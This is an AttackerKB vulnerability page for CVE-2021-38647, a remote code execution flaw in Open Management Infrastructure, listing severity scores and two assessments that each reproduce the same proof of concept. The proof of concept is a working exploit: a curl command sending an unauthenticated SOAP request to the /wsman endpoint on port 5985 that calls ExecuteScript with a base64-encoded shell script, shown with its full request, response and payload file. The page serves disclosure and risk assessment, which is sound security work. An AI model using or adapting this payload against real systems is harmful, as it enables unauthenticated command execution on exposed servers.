Lucene search

AttackerKBAKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281

HistorySep 15, 2021 - 12:00 a.m.

CVE-2021-38647

2021-09-1500:00:00

attackerkb.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.973 High

EPSS

Percentile

99.8%

JSON

Open Management Infrastructure Remote Code Execution Vulnerability

Recent assessments:

wvu-r7 at September 15, 2021 4:37am UTC reported:

RCE PoC using ExecuteScript (multi-line shell script execution):

wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H "Content-Type: application/soap+xml" -d @payload.xml | xmllint --format -
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)
&gt; POST /wsman HTTP/1.1
&gt; Host: 127.0.0.1:5985
&gt; User-Agent: curl/7.64.1
&gt; Accept: */*
&gt; Content-Type: application/soap+xml
&gt; Content-Length: 1679
&gt; Expect: 100-continue
&gt;
* Done waiting for 100-continue
} [1679 bytes data]
* We are completely uploaded and fine
&lt; HTTP/1.1 200 OK
&lt; Content-Length: 1393
&lt; Connection: Keep-Alive
&lt; Content-Type: application/soap+xml;charset=UTF-8
&lt;
{ [1393 bytes data]
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
&lt;?xml version="1.0"?&gt;
&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wsmb="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:msftwinrm="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"&gt;
  &lt;SOAP-ENV:Header&gt;
    &lt;wsa:To&gt;http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous&lt;/wsa:To&gt;
    &lt;wsa:Action&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript&lt;/wsa:Action&gt;
    &lt;wsa:MessageID&gt;uuid:19754ED3-CC01-0005-0000-000000010000&lt;/wsa:MessageID&gt;
    &lt;wsa:RelatesTo&gt;uuid:00B60932-CC01-0005-0000-000000010000&lt;/wsa:RelatesTo&gt;
  &lt;/SOAP-ENV:Header&gt;
  &lt;SOAP-ENV:Body&gt;
    &lt;p:SCX_OperatingSystem_OUTPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"&gt;
      &lt;p:ReturnValue&gt;TRUE&lt;/p:ReturnValue&gt;
      &lt;p:ReturnCode&gt;0&lt;/p:ReturnCode&gt;
      &lt;p:StdOut&gt;
Hello
Goodbye
&lt;/p:StdOut&gt;
      &lt;p:StdErr/&gt;
    &lt;/p:SCX_OperatingSystem_OUTPUT&gt;
  &lt;/SOAP-ENV:Body&gt;
&lt;/SOAP-ENV:Envelope&gt;
wvu@kharak:~/Downloads$

payload.xml:

&lt;?xml version="1.0"?&gt;
&lt;s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"&gt;
  &lt;s:Header&gt;
    &lt;a:To&gt;HTTP://127.0.0.1:5985/wsman/&lt;/a:To&gt;
    &lt;w:ResourceURI s:mustUnderstand="true"&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem&lt;/w:ResourceURI&gt;
    &lt;a:ReplyTo&gt;
      &lt;a:Address s:mustUnderstand="true"&gt;http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous&lt;/a:Address&gt;
    &lt;/a:ReplyTo&gt;
    &lt;a:Action&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript&lt;/a:Action&gt;
    &lt;w:MaxEnvelopeSize s:mustUnderstand="true"&gt;102400&lt;/w:MaxEnvelopeSize&gt;
    &lt;a:MessageID&gt;uuid:00B60932-CC01-0005-0000-000000010000&lt;/a:MessageID&gt;
    &lt;w:OperationTimeout&gt;PT1M30S&lt;/w:OperationTimeout&gt;
    &lt;w:Locale xml:lang="en-us" s:mustUnderstand="false"/&gt;
    &lt;p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/&gt;
    &lt;w:OptionSet s:mustUnderstand="true"/&gt;
    &lt;w:SelectorSet&gt;
      &lt;w:Selector Name="__cimnamespace"&gt;root/scx&lt;/w:Selector&gt;
    &lt;/w:SelectorSet&gt;
  &lt;/s:Header&gt;
  &lt;s:Body&gt;
    &lt;p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"&gt;
      &lt;p:Script&gt;ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==&lt;/p:Script&gt;
      &lt;p:Arguments/&gt;
      &lt;p:timeout&gt;0&lt;/p:timeout&gt;
      &lt;p:b64encoded&gt;true&lt;/p:b64encoded&gt;
    &lt;/p:ExecuteScript_INPUT&gt;
  &lt;/s:Body&gt;
&lt;/s:Envelope&gt;

More context…

noraj at March 31, 2022 8:33pm UTC reported:

RCE PoC using ExecuteScript (multi-line shell script execution):

wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H "Content-Type: application/soap+xml" -d @payload.xml | xmllint --format -
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)
&gt; POST /wsman HTTP/1.1
&gt; Host: 127.0.0.1:5985
&gt; User-Agent: curl/7.64.1
&gt; Accept: */*
&gt; Content-Type: application/soap+xml
&gt; Content-Length: 1679
&gt; Expect: 100-continue
&gt;
* Done waiting for 100-continue
} [1679 bytes data]
* We are completely uploaded and fine
&lt; HTTP/1.1 200 OK
&lt; Content-Length: 1393
&lt; Connection: Keep-Alive
&lt; Content-Type: application/soap+xml;charset=UTF-8
&lt;
{ [1393 bytes data]
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
&lt;?xml version="1.0"?&gt;
&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wsmb="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:msftwinrm="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"&gt;
  &lt;SOAP-ENV:Header&gt;
    &lt;wsa:To&gt;http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous&lt;/wsa:To&gt;
    &lt;wsa:Action&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript&lt;/wsa:Action&gt;
    &lt;wsa:MessageID&gt;uuid:19754ED3-CC01-0005-0000-000000010000&lt;/wsa:MessageID&gt;
    &lt;wsa:RelatesTo&gt;uuid:00B60932-CC01-0005-0000-000000010000&lt;/wsa:RelatesTo&gt;
  &lt;/SOAP-ENV:Header&gt;
  &lt;SOAP-ENV:Body&gt;
    &lt;p:SCX_OperatingSystem_OUTPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"&gt;
      &lt;p:ReturnValue&gt;TRUE&lt;/p:ReturnValue&gt;
      &lt;p:ReturnCode&gt;0&lt;/p:ReturnCode&gt;
      &lt;p:StdOut&gt;
Hello
Goodbye
&lt;/p:StdOut&gt;
      &lt;p:StdErr/&gt;
    &lt;/p:SCX_OperatingSystem_OUTPUT&gt;
  &lt;/SOAP-ENV:Body&gt;
&lt;/SOAP-ENV:Envelope&gt;
wvu@kharak:~/Downloads$

payload.xml:

&lt;?xml version="1.0"?&gt;
&lt;s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"&gt;
  &lt;s:Header&gt;
    &lt;a:To&gt;HTTP://127.0.0.1:5985/wsman/&lt;/a:To&gt;
    &lt;w:ResourceURI s:mustUnderstand="true"&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem&lt;/w:ResourceURI&gt;
    &lt;a:ReplyTo&gt;
      &lt;a:Address s:mustUnderstand="true"&gt;http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous&lt;/a:Address&gt;
    &lt;/a:ReplyTo&gt;
    &lt;a:Action&gt;http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript&lt;/a:Action&gt;
    &lt;w:MaxEnvelopeSize s:mustUnderstand="true"&gt;102400&lt;/w:MaxEnvelopeSize&gt;
    &lt;a:MessageID&gt;uuid:00B60932-CC01-0005-0000-000000010000&lt;/a:MessageID&gt;
    &lt;w:OperationTimeout&gt;PT1M30S&lt;/w:OperationTimeout&gt;
    &lt;w:Locale xml:lang="en-us" s:mustUnderstand="false"/&gt;
    &lt;p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/&gt;
    &lt;w:OptionSet s:mustUnderstand="true"/&gt;
    &lt;w:SelectorSet&gt;
      &lt;w:Selector Name="__cimnamespace"&gt;root/scx&lt;/w:Selector&gt;
    &lt;/w:SelectorSet&gt;
  &lt;/s:Header&gt;
  &lt;s:Body&gt;
    &lt;p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"&gt;
      &lt;p:Script&gt;ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==&lt;/p:Script&gt;
      &lt;p:Arguments/&gt;
      &lt;p:timeout&gt;0&lt;/p:timeout&gt;
      &lt;p:b64encoded&gt;true&lt;/p:b64encoded&gt;
    &lt;/p:ExecuteScript_INPUT&gt;
  &lt;/s:Body&gt;
&lt;/s:Envelope&gt;

More context…

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5